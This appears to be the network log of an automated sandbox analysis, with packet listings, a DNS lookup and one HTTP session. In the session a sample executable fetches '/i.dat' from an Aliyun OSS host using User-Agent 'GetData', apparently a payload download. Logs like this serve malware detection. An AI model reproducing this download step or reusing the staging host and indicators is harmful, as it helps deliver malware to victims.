                                  Jan 11, 2025 04:35:36.466531992 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.466583014 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.466666937 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.466680050 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.466737986 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.466828108 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.466883898 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.467096090 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.467161894 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.467189074 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.467250109 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.467447042 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.467504978 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.467545033 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.467601061 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.467649937 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.467709064 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.467753887 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.467818975 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.467843056 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.467904091 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.467973948 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.468044996 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.468060017 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.468122005 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.468416929 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.468478918 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.468518019 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.468574047 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.468605042 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.468667030 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.468733072 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.468779087 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.468800068 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.468816996 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.468884945 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.469144106 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.469216108 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.469276905 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.469336033 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.469383955 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.469439030 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.469479084 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.469538927 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.469573021 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.469659090 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.469665051 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.469681978 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.469715118 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.469722986 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.469953060 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.470010996 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.470050097 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.470112085 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.470151901 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.470208883 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.470241070 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.470297098 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.558448076 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.558523893 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.558609962 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.558659077 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.558691025 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.558705091 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.558717012 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.558733940 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.558762074 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.558768988 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.558780909 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.558816910 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.558954000 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.559009075 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.559088945 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.559151888 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.559201002 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.559259892 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.559355974 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.559421062 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.767338037 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.767405033 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.802663088 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.802687883 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.802699089 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.802764893 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.802772045 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.802804947 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.802809000 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.802829027 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.802853107 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.802859068 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.802901030 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.802906036 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.802917004 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.802957058 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.802963018 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.802972078 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.803030968 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.803036928 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.803066015 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.803142071 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.803173065 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.007340908 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.009351015 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.439337015 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.439497948 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.700450897 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.700474024 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700484037 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700572014 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.700578928 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700596094 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700664043 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.700670004 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700684071 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700695038 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700759888 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.700766087 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700778961 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700803041 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.700809002 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700819969 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700884104 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.700889111 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.700962067 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.701030016 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.701035976 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.701088905 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.907330990 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.911082983 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.929933071 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.929946899 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.929961920 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.929972887 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.930140018 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.930150986 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.930172920 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.930195093 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.930234909 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.930376053 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.930382967 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.930428982 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.930434942 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:37.930485964 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:37.930519104 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.139353991 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.139398098 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.163399935 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.163413048 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.163429022 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.163438082 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.163547039 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.163556099 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.163599968 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.201128960 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.201139927 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.201167107 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.201184034 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.201354980 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.201364040 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.201416969 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.201425076 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.201546907 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.407332897 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.411139965 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.411169052 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.411175966 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.411190033 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.411195040 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.411364079 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.443195105 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.443206072 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.443228960 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.443244934 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.443414927 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.443423986 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.443455935 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.443464041 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.443564892 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.648256063 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.648289919 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.648319960 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.648452997 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.721041918 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.721067905 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.721090078 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.721121073 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.721237898 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.721247911 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.721304893 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.721313953 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.721366882 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.721412897 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.927334070 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.928888083 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.958281994 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.958309889 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.958323002 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.958332062 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.958390951 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.958400011 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.958408117 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.958417892 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.958432913 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.958437920 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:38.958487988 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:38.958518028 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.040577888 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.040615082 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.040636063 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.040647030 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.040796041 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.040807962 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.040837049 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.040855885 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.040935993 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.041014910 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.247337103 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.247448921 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.326280117 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.326307058 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.326325893 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.326426983 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.326462984 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.413604021 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.413642883 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.413670063 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.413687944 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.413692951 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.413839102 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.413850069 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.413882017 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.413888931 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.413954973 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.414026022 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.619340897 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.619460106 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.709371090 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.709398031 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.709418058 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.709542990 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.805906057 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.805929899 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.805963039 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.805984020 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.806112051 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.806121111 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.806143045 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:39.806191921 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.806240082 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:39.806297064 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:40.011353970 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:40.011456966 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:40.148679972 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:40.148699999 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:40.148792982 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:40.284118891 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:40.689277887 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:41.320734978 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:41.320765972 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:41.572282076 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:41.572325945 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:41.572427034 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:41.572731972 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:41.572751045 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:42.819303036 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:42.819509029 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:42.820034981 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:42.820055008 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:42.820265055 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:42.820272923 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.169341087 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.169378042 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.169434071 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.169450998 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.169467926 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.169531107 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.169991016 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.170066118 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.173424006 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.173501015 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.175388098 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.175538063 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.260005951 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.260054111 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.260117054 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.260128975 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.260174990 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.260174990 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.260483027 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.260544062 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.260550976 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.260607958 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.260622025 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.260691881 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.260792017 CET50010443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.260807037 CET4435001039.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.276199102 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.276236057 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:43.276307106 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.276526928 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:43.276542902 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.514812946 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.514977932 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.515561104 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.515573025 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.515630007 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.515635967 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.846023083 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.846052885 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.846144915 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.846146107 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.846168041 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.846220016 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.846474886 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.846548080 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.846554995 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.846611023 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.846636057 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.846684933 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.846712112 CET4435001139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:44.846801996 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.847337008 CET50011443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:44.847354889 CET4435001139.103.20.105192.168.2.4
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 11, 2025 04:35:25.378274918 CET5647153192.168.2.41.1.1.1
                                  Jan 11, 2025 04:35:25.716670036 CET53564711.1.1.1192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 11, 2025 04:35:25.378274918 CET192.168.2.41.1.1.10xac5aStandard query (0)662hfg.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 11, 2025 04:35:25.716670036 CET1.1.1.1192.168.2.40xac5aNo error (0)662hfg.oss-cn-beijing.aliyuncs.comsc-2ixf.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                  Jan 11, 2025 04:35:25.716670036 CET1.1.1.1192.168.2.40xac5aNo error (0)sc-2ixf.cn-beijing.oss-adns.aliyuncs.comsc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                  Jan 11, 2025 04:35:25.716670036 CET1.1.1.1192.168.2.40xac5aNo error (0)sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.105A (IP address)IN (0x0001)false
                                  • 662hfg.oss-cn-beijing.aliyuncs.com
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44991439.103.20.1054437276C:\Users\user\Desktop\2976587-987347589.07.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-11 03:35:27 UTC111OUTGET /i.dat HTTP/1.1
                                  User-Agent: GetData
                                  Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                  Cache-Control: no-cache
                                  2025-01-11 03:35:27 UTC559INHTTP/1.1 200 OK
                                  Server: AliyunOSS
                                  Date: Sat, 11 Jan 2025 03:35:27 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 512
                                  Connection: close
                                  x-oss-request-id: 6781E6FFE80D013635D0E656
                                  Accept-Ranges: bytes
                                  ETag: "A1CC6E3DD3069453BEF8913F9698C666"
                                  Last-Modified: Fri, 10 Jan 2025 12:35:03 GMT
                                  x-oss-object-type: Normal
                                  x-oss-hash-crc64ecma: 15148768218617465077
                                  x-oss-storage-class: Standard
                                  x-oss-ec: 0048-00000113
                                  Content-Disposition: attachment
                                  x-oss-force-download: true
                                  Content-MD5: ocxuPdMGlFO++JE/lpjGZg==
